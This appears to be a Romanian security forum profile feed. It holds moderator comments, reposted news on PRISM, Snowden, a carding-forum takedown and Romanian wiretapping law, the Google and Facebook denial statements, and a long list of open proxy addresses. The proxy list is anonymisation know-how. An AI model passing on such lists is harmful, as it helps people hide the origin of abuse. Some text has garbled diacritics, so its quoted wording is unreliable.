complicate si o sa invatati multe: AES, RSA... O sa para matematic, dar cel putin sunt lucruri extrem de interesante si utile! - Ingineria programarii - Nu stiu exact ce se preda, despre lucrul in echipa si alte astfel de lucruri, dar la "examen" se face un proiect in echipa, 5-6 persoane se e interesant, limbajul la alegere... Optionale: Dupa cum poate ati observat, in anul III sunt doar 5 materii in loc de 6. Pe langa aceste materii mai exista un "optional" care este de fapt obligatoriu, dar cel putin vi-l puteti alege. Nu stiu sa va zic toate optionalele, va zic doar sa NU alegeti "Algoritmi genetici" si sa faceti cererea de alegere, ca de nu, o sa va bage automat la o porcarie pe care nu o vrea nimeni (ca pe mine). Concluzie: Practic va recomand aceasta facultate daca: 1. nu va stresati cu materiile de matematica si copiati la examene 2. va duceti pe la cursurile "verzi" pentru ca nu aveti nimic de pierdut si o sa va prinda bine Astept si parerile voastre.
  14. Nytro
    Modifica si tu exemplele de la final:IPC:Shared Memory
  15. Nytro
    Superb!
  16. Nytro
    misefalfaie , yo20063 - De acord. Aveti ban. O sa il scot cand "va invita cineva". Mai considera cineva ca accesul la informatii trebuie restrictionat?
  17. Nytro
    [h=1]Scandalul scurgerii de informa?ii din SUA, semnalul unei amenin??ri la adresa libert??ilor individuale?[/h]Iulia Marin | 11/06/2013 Primele informa?ii cu privire la programul secret de supraveghere al Guvernului american au ap?rut miercuri. De atunci ?i pân? ast?zi, Edward Snowden, fostul angajat CIA care se afl? în spatele scurgerii de informa?ii, a devenit un personaj central, chiar unul de care depinde stabilitatea SUA în acest moment. Joi, “The Washington Post” ?i “The Guardian” au ar?tat c? NSA (Autoritatea Na?ional? de Supraveghere) a accesat serverele a nou? companii, printre care ?i Google, Microsoft sau Facebook, pentru a intercepta mesajele transmise în mediul online, cu ajutorul programului PRISM, dezvoltat, potrivit site-ului theatlantic.com, cu ajutorul unor firme private din Sillicon Valley. Toate companiile men?ionate neag? îns? implicarea în acest scandal. Informa?ia a provocat reac?ii de indignare în lumea întreag?, iar liderii Uniunii Europene au precizat deja c? a?teapt? explica?ii din partea administra?iei Obama. În acela?i timp, Casa Alb? a refuzat s? furnizeze date suplimentare, mai mul?i oficiali confirmând c? Snowden este deja subiectul unei investiga?ii. Edward Snowden, fostul angajat CIA, se afla în Hong Kong din 20 mai ?i se pare c? luni dup?-amiaz? ar fi p?r?sit hotelul unde era cazat, f?r? s? se mai afle nimic despre el. În interviul acordat cotidianului britanic “The Guardian”, Snowden a explicat c? obiectivul s?u a fost s? ac?ioneze în numele binelui comun ?i a insistat c? nu dore?te ca mass-media s? se concentreze doar asupra lui, tratând superficial informa?iile prezentate. Între timp, Barack Obama este supus unor presiuni serioase, fiind somat s? aib? o pozi?ie oficial? în acest sens, în contextul în care a negat în repetate rânduri faptul c? ar exista un astfel de program de supraveghere ?i a dat asigur?ri c? dreptul la via?a privat? este respectat. În Europa, cancelarul german Angela Merkel a insistat c? dore?te ca Obama s? ofere o serie de explica?ii referitoare la informa?iile furnizate de Snowden, în timp ce ?efa Comisiei Europene, Viviane Reding, a ad?ugat c? protejarea datelor fundamentale nu ar trebui s? fie un lux, ci un drept fundamental. Pe de alt? parte, într-un sondaj dat publicit??ii mar?i, realizat de Institutul Pew Research, se arat? c? peste 50% dintre americani consider? c? interceptarea conversa?iilor telefonice este “acceptabil?”. Rezultatul sondajului ar putea fi explicat prin prisma faptului c? tot mai mul?i cet??eni sunt însp?imânta?i de perspectiva unor atacuri teroriste, mai ales dup? atacurile din 11 septembrie 2001, dar chiar ?i dup? cele de la maratonul din Boston, care au avut loc anul acesta. De altfel, prevenirea atacurilor teroriste prin monitorizarea oric?rui tip de comunicare interpersonal? a fost ?i modul în care autorit??ile au justificat existen?a PRISM. În acela?i timp, mai multe cotidiene americane au ar?tat c? autorit??ile ar putea solicita extr?darea lui Snowden în Statele Unite, de teama ca oficialii chinezi s? nu afle mai multe informa?ii referitoare la programele de supraveghere. Dac? oficialii americani îl “vâneaz?”, îns?, cet??enii sunt de partea sa, cel pu?in asta se poate în?elege dintr-o peti?ie online prin care se cere absolvirea sa de orice vin? ?i care a fost semnat?, pân? la ora scrierii acestui articol, de c?tre 42.450 de persoane, în timp ce o alt? peti?ie îl “provoac?” pe Barack Obama s? ia parte la o dezbatere televizat? difuzat? în direct, în care s? discute problema chiar cu Edward Snowden. Dac? peti?ia care cere “iertarea” lui Snowden va strânge 100.000 de semn?turi pân? pe 9 iulie, va trebui ca solicitarea s? fie supus? aten?iei oficialilor de la Casa Alb?. În cele din urm?, întrebarea în jurul c?reia se construie?te întreaga dezbatere este dac? eventualele amenin??ri teroriste sunt o justificare pentru crearea unui stat de tip “Big Brother”, inspirat, parc?, din romanul lui George Orwell, “1984?: “Obiectul terorismului este chiar terorismul. Obiectul opresiunii este opresiunea. Obiectul torturii este tortura. Obiectul crimei este crima. Obiectul puterii este puterea. Acum începi s? în?elegi?” Sursa: Scandalul scurgerii de informa?ii din SUA, semnalul unei amenin??ri la adresa libert??ilor individuale? | eoficial.ro
  18. Nytro
    Putina motivare: cine pica bacul are ban :->
  19. Nytro
    [h=1]$200 Million Cybercrime Forum Disabled; 11 People Arrested[/h]By: Bianca Stanescu Vietnamese and UK police arrested 11 people and disabled a cybercrime forum that facilitated more than $200 million worth of credit card fraud, according to a press release by the Serious Organized Crime Agency. The forum Mattfeuter.ru had about 16,000 members and sold more than a million credit card numbers that were leaked after hacking and fraud. Three of the people arrested in the UK were “significant” users of the illegal forum. Police also caught 23 year-old Duy Hai Truong, a suspected ring leader from Vietnam. “One of the world’s major facilitation networks for online card fraud has been dismantled by this operation, and those engaged in this type of crime should know that that they are neither anonymous, nor beyond the reach of law enforcement agencies,” said Andy Archibald, interim deputy director of SOCA’s National Cyber Crime Unit. Mattfeuter members gained access to the website through a secure login, then specified the quantity and type of credit card data they wanted. Users were also able to check if the information they were buying was usable, and had discounts for bulk purchases. The operation was led by the Vietnamese High-Tech Crime Unit, the Criminal Investigation Division of the Ministry of Public Security of Vietnam, SOCA, the UK’s Metropolitan Police Central e-Crime Unit, and the FBI. According to Police, other arrests may soon follow. Sursa: $200 Million Cybercrime Forum Disabled; 11 People Arrested | HOTforSecurity
  20. Nytro
    Cinci mituri despre intercept?rile telefonice în România. Cum urm?resc procurorii e-mail-urile ?i discu?iile de pe Facebook ale românilor de Biro Attila Publicat la: 08.06.2013 11:00 Dac? în Statele Unite presa relateaz? cu stupoare despre scandalul PRISM legat de interceptarea comunica?iilor de pe Internet, în România procurorii folosesc cu succes astfel de date ca probe în dosare penale. În ?ara noastr?, interceptarea con?inutului unui e-mail se face la fel de u?or ca interceptarea unei convorbiri telefonice. Pe lâng? e-mail-uri, procurorii utilizeaz? deseori fapte ?i date ob?inute legal despre localizarea unor inculpa?i. O astfel de prob? a fost utilizat? în dosarul Valiza. În acest context, gândul v? prezint? modalit??ile de interceptare folosite de autorit??ile române, precum ?i cinci mituri despre aceste instercept?ri. E-mail, Facebook sau Mesenger, la fel de u?or de interceptat ca telefonul Potrivit speciali?tilor consulta?i de gândul, interceptarea e-mail-urilor, a comunic?rilor pe Facebook sau a altor tipuri de comunica?ii desf??urate pe Internet se face la fel de simplu precum intercept?rile convorbirilor telefonice. Ba mai mult, intercept?rile e-mail-urilor au ?i avantajul c? nu mai trebuie transcrise. Astfel c? un procuror poate solicita mandat dac? are date sau indicii c? un cet??ean comite o infrac?iune ?i utilizeaz? în acest sens e-mail-ul sau dac? procurorul consider? c? pot ob?ine probe conculudente din interceptarea e-mail-urilor. La fel ca în cazul intercept?rilor telefonice, ?i la e-mail-uri interceptarea trebuie s? fie aprobat? de un judec?tor. E-mail-urile ?i discu?iile de pe Facebook sunt interceptate în timp real Procurorii pot intercepta coresponden?a online în timp real, la fel cum dup? ob?inerea unui mandat de la judec?tor pot intercepta în timp real ?i comunica?iile din chat-ul de la Facebook sau de pe orice alt? re?ea. Pentru a realiza aceste intercept?ri, organele de anchet? nu au nevoie s? cear? permisiunea Google sau Facebook, ori a diver?ilor furnizori de servicii de e-mail. Astfel c? intercept?rile se realizeaz? prin sistemul de intercept?ri al SRI, care opereaz? direct cu providerii de Internet. Legisla?ia din România ?i din UE spune c? orice operator de telefonie sau provider de Internet este obligat s? semneze protocoale de acest fel cu autorit??ile. Prin aceste protocoale, SRI are acces la echipamentele acestor operatori ?i poate efectua intercept?rile telefonice sau cele de date. Localizarea telefoanelor mobile, stocat? de companiile de telefonie ?i folosit? de procurori: cazul Valiza Pe lâng? interceptarea convorbirilor telefonice, procurorii au posibilitatea s? cear?, în baza unui mandat, ?i localizarea telefoanelor mobile. Mai exact, un procuror poate determina unde s-a aflat telefonul mobil al unui inculpat la un moment anume. Aceste date sunt stocate de companiile de telefonie. Procurorii au folosit aceast tip de probatoriu în dosarul Valiza. Dup? izbucnirea scandalului legat de mituirea juc?torilor de la U Cluj, Gigi Becali a încercat s? acrediteze ideea c? valiza cu bani era destinat? cump?r?rii unui teren. Astfel c? dup? ce mâna lui dreapta, Teia Sponte, a fost re?inut, Becali a încercat s? falsifice probe. Mai precis, a încercat s? falsifice un antecontract de vânzare-cump?rare cu un cet??ean din Cluj. Patronul Stelei a declarat ?i a prezentat la DNA un contract care era întocmit ?i semnat în 14 aprilie. În realitate, procurorii au demonstrat c? documentul a fost semnat dup? data de 7 mai când Teia Sponte a fost re?inut. Procurorii au solicitat prin mandat aprobat de judec?tor ca operatorii de telefonie mobil? s? pun? la dispozi?ia lor localizarea telefoanelor mobile de?inute de Gigi Becali, Victor Pi?urc?, avocata Ciul Alina ?i Gheorghe Marion, presupusul vânz?tor al terenului. To?i patru au declarat c? în 14 aprilie au participat la semnarea contractului dintre Becali ?i Marion pentru un teren din Cluj care ar valora fix 1,7 milioane euro, adic? cu banii cu care a fost prins Teia Sponte. Dup? ce au primit datele de la operatorii de telefonie mobil?, procurorii au ar?tat c? pe 14 aprilie cei patru nu s-au întâlnit ?i nu aveau cum s? semneze contractul. În plus, coroborând aceste informa?ii cu alte date, procurorii au stabilit c? Gheorghe Marino se afla la Cluj unde a participat ca martor la un proces. ”În leg?tur? cu învinuitul Pi?urc? Victor, listingul cu identificarea traficului telefonic ?i a celulei de localizare, îl plaseaz? pe acesta, în data de 15.04.2008, în intervalul 00:28 min.-17:59 min., numai în str. Erou Iancu Nicolae nr.126.A, din localitatea Pipera, jude?ul Ilfov, unde î?i are domiciliul, fiind exclus? prezen?a sa în imobilul din str.Aleea Alexandru nr.1, sector 1 Bucure?ti”, precizeaz? procurorii în cadrul rechizitoriului din dosarul Valiza. Localizarea personajelor din aprilie, reconstituit? informatic în septembrie Procurorii au primit mandat de la judec?tor pentru punerea la dispozi?ie a datelor de localizare pentru Becali, Pi?urc?, avocata Ciul ?i Marino, acesta din urm? nefind monitorizat în luna septembrie 2008. Datele cerute se refereau la luna aprilie, deci cu patru luni în urm? fa?? de momentul cererii. Din rechizitoriu, rezult? c? procurorii au primit datele de localizare chiar ?i pentru Gheorghe Marino, al c?rui telefon nu era ascultat dup? patru luni de la momentul în care acesta sus?inea c? a fost în Bucure?ti. Potrivit legisla?iei, operatorii de telefonie sunt obliga?i s? stocheze datele timp de ?ase luni. În 2012, a fost transpus? în legisla?ia noastr? directiva european? a reten?iei datelor. Astfel, legea adoptat? anul trecut prevede obligativitatea furnizorilor de telefonie fix? ?i mobil? ?i de Internet s? re?in? timp de 6 luni anumite date ale abona?ilor care s? fie trimise, la cerere, autorit??ilor din domeniul siguran?ei na?ionale pentru ac?iunile de prevenire, cercetare, descoperire ?i urm?rire a infrac?iunilor grave. Pe lâng? interceptarea telefoanelor, în dosarul hackerului „Micul Fum”, care a fost acuzat c? a spart adresele mai multor vedete, procurorii au utilizat ca metod? investigativ? ?i interceptarea de date, ei cerând informa?ii de la compania Facebook. Cum acesta folosea programe informatice pentru a-?i ascunde IP-ul real, procurorii au cerut atât interceptarea telefonului s?u, cât ?i date de la providerii de Internet. Astfel c?, prin coroborarea acestor date, procurorii l-au identificat pe „Micul Fum” în persoana lui Laz?r Marcel Lehel. Judec?torii l-au condamnat pe acesta la 3 ani de închisoare cu suspendare. ”În cauz?, în vederea identific?rii autorului faptei, au fost solicitate administratorilor serverelor de po?t? electronic? YAHOO! ?i GMAIL, precum ?i reprezentan?ilor re?elei de socializare FACEBOOK log-urile de acces din perioada în litigiu, atât la conturile compromise ale p?r?ilor v?t?mate, cât ?i la conturile autorului atacurilor informatice”, se arat? în rechizitoriu. Cinci mituri despre intercept?rile telefonice Mitul nr 1: SRI ascult? pe toat? lumea. Principalul mit al intercept?rilor este acela c? to?i cet??enii care au telefoane mobile sunt intercepta?i si asculta?i de SRI. Anual, în România sunt înregistrate aproximativ 20.000 de mandate de interceptare. Dintre acestea, aproximativ 3.000 sunt în baza legii siguran?ei na?ionale. Cele mai multe dintre intercept?rile realizate de SRI sunt destinate organelor de cercetare penal?, DIICOT, Parchetul General, DNA, etc. Mitul nr 2: Intercept?rile se fac abuziv, cu înc?lcarea legii. În România, intercept?rile se fac în principiu în felul urm?tor: procurorul formuleaz? o cerere unui judec?tor, prin care solicit? autorizarea intercept?rii unei persoane, judec?torul analizeaz? cererea ?i decide dac? aprob? sau nu. Odac? ce a primit mandatul de interceptare de la judec?tor procurorul îl trimite c?tre SRI care introduce mandatul într-un sistem electronic. Sistemul inregistreaz? mandatul ?i porne?te înregistrarea convorbirilor. Înregistrarea convorbirilor nu se face la SRI, ci la parchetul care a cerut ?i a primit mandatul de interceptare. Sistemul este automatizat, astfel c?, odat? ce perioada de interceptare aprobat? a expirat, interceptarea comunica?iilor se opre?te automat. În România, sunt dou? categorii de intercept?ri, cel pu?in cele care apar în dosarele penale. Prima categoria sunt înregistr?rile aprobate pe mandate normale ?i, de cealalt? parte, cele pe legea siguran?ei na?ionale. Aceste întercept?ri sunt aprobate în baza articolului 91 din Codul Procedur? Penal?. Procurorul poate autoriza provizoriu pe 24 sau 48 de ore interceptarea f?r? mandat dar în mod obligatoriu dup? expirarea acestei periode trebuie s? solicite un mandat post factum. În România a existat un singur caz în care CEDO nereguli în procedura de interceptare. Este vorba de cazul Dinu Patriciu. Speciali?tii spun îns? c? aceast? condamnarea se datoreaz? în principal unei legisla?iei proaste de dinainte de 2004. Dup? 2004, legisla?ia privind intercept?rile a fost modificat? ?i nu s-au înregistrat oficial cazuri de abuzuri. Mitul nr 3: Intercept?rile pe siguran?? na?ional?, nelimitate ?i f?r? control. Potrivit speciali?tilor contacta?i de gândul, în România se emit anual în jur de 3.000 de mandate de interceptare în baza legii siguran?ei na?ionale. Fa?? de mandatele de interceptare obi?nuite, aceste mandate sunt avizate de Curtea Suprem?. Interceptarea pe legea siguran?ei na?ionale a unui cet??ean are urm?torul traseu: SRI colecteaz? date sub suspiciunea de infrac?iuni la legea siguran?ei ?i decide s? cear? un mandat de interceptare. Chiar ?i la SRI exist? un prim filtru pe aceste cereri. Serviciul formuleaz? o cerere c?tre procurorul general în care prezint? argumentele pentru care dore?te s? intercepteze convorbirile persoanei vizate. Procurorul general are posibilitatea s? resping? cererea SRI. De la Parchetul General, cererea ajunge la Curtea Suprem?, unde judec?torii analizeaz? acest? solicitare si aprob? sau nu mandatul. Potrivit speciali?tilor, num?rul de mandate emise în România dep??e?te media de mandate/locuitor emise de alte ??ri din Europa. Atât Parchetul General, cât ?i SRI analizeaz? aceste mandate în baza hot?rârilor CEDO care s-au pronun?at pe cauze care priveau intercept?ri abuzive, astfel încât, în principiu, exist? anumite filtre ?i garan?ii c? nu se vor comite erori sau abuzuri. Mitul nr 4: Intercept?rile convorbirilor audio sunt modificate de SRI si procurori. Un alt mit al intercept?rilor este acela c? SRI ?i procurorii modific? fi?ierele audio ale intercept?rilor. În fa?a instan?elor, în special în dosarele de corup?ie, inculpa?ii au acuzat procurorii c? au modificat intercept?rile astfel încât probele s? fie în favoarea acuz?rii. Fisierele audio cu intercept?ri sunt fi?iere speciale care au în componen?? elemente de siguran??. La fel ?i fi?ierele video rezultate din supravegherea operativ? video a unui acuzat. Astfel c?, dac? un procuror ar dori s? modifice un fi?ier video sau audio, aceste fi?iere s-ar corupe ?i nu ar mai putea fi utilizate. De altfel, aceste fi?iere con?in ?i date suplimentare prin care poate fi identificat? fiecare persoan? care a folosit documentele. Astfel c?, potrivit speciali?tilor consulta?i degândul, este practic imposibil ca o interceptare s? fie compilat?. Mitul num?rul 5: Procurorii fac intercept?ri pe care le ?in ascunse în sertare. Un alt mit al intercept?rilor este acela c? procurorii sau SRI realizeaz? intercept?ri ilegale pe care le ?in la secret ?i le utilizeaz? în scopuri oneroase. În realitate, sistemul informatic cu care realizeaz? intercept?ri nu permite ascultarea telefoanelor f?r? mandat sau f?r? o ordonan?? provizorie a procurorului care trebuie confirmat? ulterior de judec?tor. Astfel c? exist? în permanen?? o eviden?? oficial? a celor care emit ordonan?e ?i celor care sunt asculta?i. În plus, sistemul informatic ?terge automat dup? 10 zile intercept?rile care nu sunt extrase din sistem ?i ata?ate unui dosar. Sursa: Cinci mituri despre intercept?rile telefonice în România. Cum urm?resc procurorii e-mail-urile ?i discu?iile de pe Facebook ale românilor - Gandul
  21. Nytro
    Page and Zuckerberg Denials ZUCKERBERG DENIAL I want to respond personally to the outrageous press reports about PRISM: Facebook is not and has never been part of any program to give the US or any other government direct access to our servers. We have never received a blanket request or court order from any government agency asking for information or metadata in bulk, like the one Verizon reportedly received. And if we did, we would fight it aggressively. We hadn't even heard of PRISM before yesterday. When governments ask Facebook for data, we review each request carefully to make sure they always follow the correct processes and all applicable laws, and then only provide the information if is required by law. We will continue fighting aggressively to keep your information safe and secure. We strongly encourage all governments to be much more transparent about all programs aimed at keeping the public safe. It's the only way to protect everyone's civil liberties and create the safe and free society we all want over the long term. PAGE DENIAL You may be aware of press reports alleging that Internet companies have joined a secret U.S. government program called PRISM to give the National Security Agency direct access to our servers. As Google’s CEO and Chief Legal Officer, we wanted you to have the facts. First, we have not joined any program that would give the U.S. government—or any other government—direct access to our servers. Indeed, the U.S. government does not have direct access or a “back door” to the information stored in our data centers. We had not heard of a program called PRISM until yesterday. Second, we provide user data to governments only in accordance with the law. Our legal team reviews each and every request, and frequently pushes back when requests are overly broad or don’t follow the correct process. Press reports that suggest that Google is providing open-ended access to our users’ data are false, period. Until this week’s reports, we had never heard of the broad type of order that Verizon received—an order that appears to have required them to hand over millions of users’ call records. We were very surprised to learn that such broad orders exist. Any suggestion that Google is disclosing information about our users’ Internet activity on such a scale is completely false. Finally, this episode confirms what we have long believed—there needs to be a more transparent approach. Google has worked hard, within the confines of the current laws, to be open about the data requests we receive. We post this information on our Transparency Report whenever possible. We were the first company to do this. And, of course, we understand that the U.S. and other governments need to take action to protect their citizens’ safety—including sometimes by using surveillance. But the level of secrecy around the current legal procedures undermines the freedoms we all cherish. Sursa: https://docs.google.com/document/d/1mv06t60fV9YclwHzFmDOEk2wGGBj-jd5od7cS-I-d6E/edit?pli=1
  22. Nytro

    Programator c++

    Nytro replied to peleme's topic in RST Market

    Il recomand pe nedo.
  23. Nytro

    Port Scanner

    Nytro replied to wewe's topic in Cosul de gunoi

    Hexat, ban permanent. Muie.
  24. Nytro
    [h=1]Coca Colas' Elite Proxies 5/29/13[/h] 202.114.6.37:9001 190.102.3.152:80 124.95.162.210:80 112.90.178.235:80 69.197.132.68:8089 113.31.42.30:8888 222.42.1.232:83 221.10.102.203:80 5.199.166.250:7808 69.197.132.68:7808 61.183.0.91:7938 184.154.85.252:7808 221.10.102.203:83 211.151.186.228:80 66.35.68.145:8089 192.227.137.47:7808 173.213.96.229:8089 192.227.137.47:3128 192.95.14.4:8089 198.154.114.100:8089 66.35.68.146:8089 192.110.163.22:8089 91.121.100.200:8118 74.221.211.12:8089 218.108.242.124:80 192.227.137.47:8089 192.110.163.22:3128 66.35.68.145:3128 208.68.37.137:8089 178.18.17.211:8089 221.10.102.203:84 178.18.17.208:3128 202.109.178.22:8080 108.61.89.152:3128 222.42.1.226:82 60.195.251.202:80 108.61.89.152:7808 66.35.68.146:7808 208.68.37.137:7808 199.15.248.179:7808 198.154.114.100:7808 192.110.163.22:7808 173.213.96.229:7808 178.18.17.211:7808 173.193.200.199:7808 178.18.17.208:7808 198.245.70.92:7808 91.228.53.28:7808 85.233.90.6:80 61.180.49.18:80 61.55.141.10:81 91.228.53.28:3128 178.18.17.208:8089 192.95.14.4:3128 208.68.37.137:3128 198.245.70.92:3128 37.221.162.147:443 209.170.122.42:80 222.73.242.137:81 209.97.203.60:3128 192.95.14.4:7808 66.35.68.145:7808 178.18.17.211:3128 79.170.55.226:80 122.96.59.103:81 122.96.59.103:80 222.42.1.226:83 212.160.138.234:80 222.88.236.236:81 173.213.96.229:3128 198.154.114.100:3128 61.55.141.11:81 64.178.172.154:9015 164.77.196.78:80 27.34.142.47:9090 61.155.9.130:1080 209.97.203.64:3128 91.228.53.28:8089 74.221.211.12:3128 221.10.40.236:81 178.21.112.27:3128 221.10.40.236:80 113.12.83.157:80 222.73.233.146:82 173.193.200.199:8089 77.94.48.4:80 58.240.98.179:80 116.28.65.249:80 218.28.112.114:809 180.247.222.129:80 190.151.116.146:80 174.137.152.60:8080 188.165.253.198:3128 221.10.40.232:82 221.10.40.232:81 124.128.20.79:8090 77.175.49.198:80 95.67.106.110:3128 116.77.35.118:80 218.94.1.166:82 119.36.87.26:83 219.150.204.30:80 198.102.29.195:3128 221.10.40.232:83 27.3.40.249:8080 216.201.182.164:80 74.63.243.248:80 202.104.188.53:80 54.234.65.111:443 134.76.20.210:80 75.125.208.10:8118 184.82.206.46:8888 64.62.247.244:80 37.46.197.58:3128 202.158.163.202:80 183.92.246.1:8080 116.38.254.26:18080 210.31.191.58:8080 119.194.107.89:80 220.248.7.106:80 69.50.208.129:80 59.11.237.151:808 109.123.111.99:80 54.247.99.253:443 77.175.12.100:80 60.220.212.60:14693 127.0.0.7:80 63.141.249.37:8089 118.244.183.69:80 218.204.39.164:80 222.220.34.74:1337 202.142.20.209:8088 115.25.216.6:80 202.142.20.224:8088 127.201.233.180:80 127.204.233.180:80 61.147.107.18:808 74.115.0.71:465 187.210.4.53:808 27.34.142.48:9090 202.175.87.69:808 77.175.10.120:80 176.227.208.237:3128 93.170.144.2:80 115.234.223.60:80 193.106.27.215:3128 202.142.20.249:8088 183.181.27.248:80 92.45.49.65:80 74.50.59.198:80 211.87.190.186:808 151.237.189.8:80 211.167.112.14:80 76.12.152.93:80 59.64.39.164:808 221.130.17.60:80 202.119.199.147:8080 119.36.87.32:81 201.243.100.100:3128 202.112.120.66:2345 93.157.103.243:80 188.142.73.149:80 188.142.16.249:80 61.136.68.76:808 194.149.136.24:80 54.232.93.23:80 205.164.41.101:3128 173.242.120.132:443 180.96.64.179:8080 218.2.129.53:9028 63.141.249.37:3128 173.10.134.173:8081 218.213.197.81:8088 110.136.175.173:8080 218.210.199.254:80 180.96.64.181:8080 61.135.179.167:8080 50.112.232.184:8080 186.201.198.254:8080 37.221.192.212:80 186.89.208.146:3128 80.56.75.99:80 88.198.64.141:8118 218.204.39.136:80 205.164.41.101:8089 208.84.135.55:3128 222.73.233.146:86 77.236.209.236:8080 124.128.20.80:8090 221.130.18.188:80 46.4.214.126:8118 60.220.212.67:29786 91.121.11.120:8080 111.1.32.124:81 124.227.191.74:9000 188.142.78.234:80 221.181.192.29:80 124.227.192.6:9000 205.164.41.101:7808 123.103.23.106:29786 46.61.185.31:8081 208.84.135.55:7808 95.181.33.22:8080 58.242.249.31:33944 58.242.249.31:34015 58.242.249.31:33965 58.242.249.31:34034 58.242.249.31:34043 58.242.249.31:35010 58.242.249.31:34484 58.242.249.31:33925 58.242.249.31:33987 58.242.249.31:34032 58.242.249.31:34061 58.242.249.31:23685 58.242.249.31:33942 58.242.249.31:33948 58.242.249.31:33976 58.242.249.31:33919 58.242.249.31:33719 58.242.249.31:20771 58.242.249.31:29832 58.242.249.31:18888 58.242.249.31:23684 58.242.249.31:21725 58.242.249.31:24809 58.242.249.31:29037 58.242.249.31:24379 58.242.249.31:21724 58.242.249.31:18204 58.242.249.31:19305 58.242.249.31:19279 58.242.249.31:17183 58.242.249.31:18350 58.242.249.31:18256 58.242.249.31:18253 58.242.249.31:17945 58.242.249.31:17657 58.242.249.31:15238 58.242.249.31:17403 58.242.249.31:16515 58.242.249.31:17130 58.242.249.31:16158 58.242.249.31:10000 58.242.249.31:16107 58.242.249.31:15275 58.242.249.31:15692 58.242.249.31:14826 58.242.249.31:13789 58.242.249.31:13669 58.242.249.31:11095 58.242.249.31:13243 58.242.249.31:13374 58.242.249.31:10080 115.160.227.35:80 192.95.35.201:8089 218.93.53.114:8888 125.216.144.199:8080 208.110.83.202:8089 195.209.245.226:3128 210.242.4.253:81 220.194.47.221:8080 190.102.30.19:80 218.108.85.59:82 202.142.20.205:8088 88.116.151.46:3129 50.57.175.200:8080 219.148.47.124:11119 173.212.242.164:7808 173.212.242.164:8089 64.120.242.24:3128 208.84.135.55:8089 46.51.192.48:80 5.135.81.16:8089 198.102.29.195:8089 116.228.55.217:8888 117.135.151.106:31288 124.237.77.152:8080 50.57.170.105:80 114.112.243.230:8080 97.118.113.31:80 211.99.212.154:809 111.1.32.124:82 67.215.228.129:8089 221.130.18.189:80 133.242.158.145:80 67.215.228.129:3128 63.141.249.37:7808 65.126.16.155:3128 173.213.113.111:8089 112.231.65.71:80 67.215.228.129:7808 119.167.231.73:8080 221.123.162.123:3128 217.77.50.181:3128 178.151.68.210:8080 220.247.224.103:9080 222.42.1.232:80 5.34.244.146:80 113.106.99.226:9000 183.238.133.41:80 54.234.65.111:80 124.42.121.147:8080 172.245.20.109:7808 222.88.236.236:83 211.151.187.88:80 23.29.127.173:7808 58.242.249.31:18080 91.219.238.77:7808 72.29.4.111:8089 72.29.4.111:3128 64.120.242.24:8089 119.167.231.72:8080 61.150.43.124:8080 173.213.113.111:7808 221.10.102.203:81 184.154.85.252:8089 95.31.18.119:3128 203.186.109.21:80 199.15.248.179:8089 202.202.96.84:8086 110.53.48.54:8080 72.29.4.111:7808 5.199.166.250:8089 192.95.35.201:3128 122.192.166.70:8080 199.30.136.116:8089 222.88.236.236:82 50.57.179.82:80 74.115.0.71:80 199.30.136.117:8089 58.32.208.251:8080 198.102.29.195:7808 113.31.42.30:1080 116.228.55.217:8000 5.135.81.16:7808 65.126.16.155:7808 198.27.79.149:8089 61.155.159.9:8989 202.112.113.7:80 192.95.35.201:7808 113.161.70.62:8080 116.228.55.184:80 198.27.79.149:7808 77.243.10.210:3128 27.17.61.117:9797 116.255.199.64:8080 184.154.85.252:3128 218.108.14.106:8808 198.27.79.149:3128 173.212.242.164:3128 85.92.159.84:8080 109.73.174.54:8080 50.112.235.132:80 221.10.102.203:82 222.73.233.146:80 119.36.87.32:83 62.64.9.129:3128 110.138.206.234:80 119.188.6.225:80 199.30.136.116:3128 94.247.25.162:80 222.42.1.226:81 173.193.200.199:3128 74.221.211.12:7808 199.30.136.116:7808 199.30.136.117:7808 219.232.47.153:80 31.131.30.161:3128 173.201.180.179:8080 124.207.80.227:80 27.54.182.158:80 66.35.68.146:3128 221.11.8.90:8080 101.226.74.168:8080 101.226.74.168:8081 213.160.143.150:3128 219.243.221.77:8080 222.73.242.137:80 222.42.1.226:80 67.55.115.76:8080 80.82.64.196:3128 199.193.114.15:8080 58.53.192.218:8123 218.249.86.131:553 119.36.87.32:80 190.102.17.240:80 94.137.239.19:81 211.151.115.16:2020 77.94.48.5:80 113.106.99.242:9000 218.107.132.66:2345 23.20.66.136:8080 202.116.160.89:80 84.29.56.72:80 123.103.23.106:11322 113.59.34.19:8090 123.103.23.106:10064 123.103.23.106:18508 60.195.251.213:8888 123.103.23.106:16660 123.103.23.106:11375 113.105.96.246:9090 222.57.81.198:8080 61.6.47.6:80 221.10.40.232:80 42.121.31.177:8080 194.78.20.11:8080 114.80.136.112:7780 112.125.94.54:80 119.36.87.26:81 118.126.11.36:80 166.78.253.54:80 202.142.20.238:8088 109.60.139.153:33080 122.72.0.28:80 84.26.231.56:80 127.1.0.1:80 127.204.233.19:80 127.20.233.180:80 193.239.220.148:80 202.99.21.162:8081 127.204.233.190:80 5.34.241.154:80 127.20.233.18:80 127.240.233.180:80 91.201.118.59:80 113.106.99.238:9000 220.248.176.108:3128 37.46.197.58:7808 82.204.100.37:80 118.213.148.178:80 82.75.247.8:80 83.151.4.208:8080 64.251.30.39:80 122.255.102.238:8080 198.204.231.235:3128 188.142.78.66:80 118.69.205.202:4624 46.105.20.6:8080 77.175.77.180:80 216.52.171.101:80 61.242.169.94:81 190.57.231.66:3128 61.6.254.74:8080 195.228.147.196:8080 203.126.25.164:80 77.175.78.112:80 178.150.156.219:54321 66.161.136.19:80 198.245.70.92:8089 183.181.164.180:80 80.120.42.142:3129 212.138.144.5:8118 190.102.17.180:80 219.234.80.221:80 23.29.127.173:8089 123.103.23.106:11882 123.103.23.106:15880 116.255.136.106:8989 119.62.72.202:8080 221.2.241.125:8087 54.241.211.5:80 77.175.79.221:80 211.167.112.14:82 162.209.65.100:80 202.115.27.8:123 202.112.126.88:2345 221.232.247.27:443 77.242.223.121:3128 60.220.212.60:11171 60.220.212.60:11022 60.220.212.60:22277 60.220.212.60:14841 60.220.212.60:14848 58.242.249.31:29786 60.220.212.60:11044 60.220.212.60:11033 60.220.212.60:11011 117.41.243.113:8081 157.7.137.74:80 175.139.211.105:80 54.214.17.37:80 125.208.1.163:80 218.108.85.59:80 60.220.212.60:11055 218.25.249.188:81 111.1.32.124:83 58.240.98.182:81 67.229.57.122:80 219.83.42.152:80 177.70.9.79:80 61.10.17.17:8181 64.120.242.24:7808 213.85.76.120:3128 46.61.185.31:8080 65.126.16.155:8089 113.106.99.237:9000 172.245.20.109:3128 123.103.23.106:18080 23.29.127.173:3128 211.107.42.231:8000 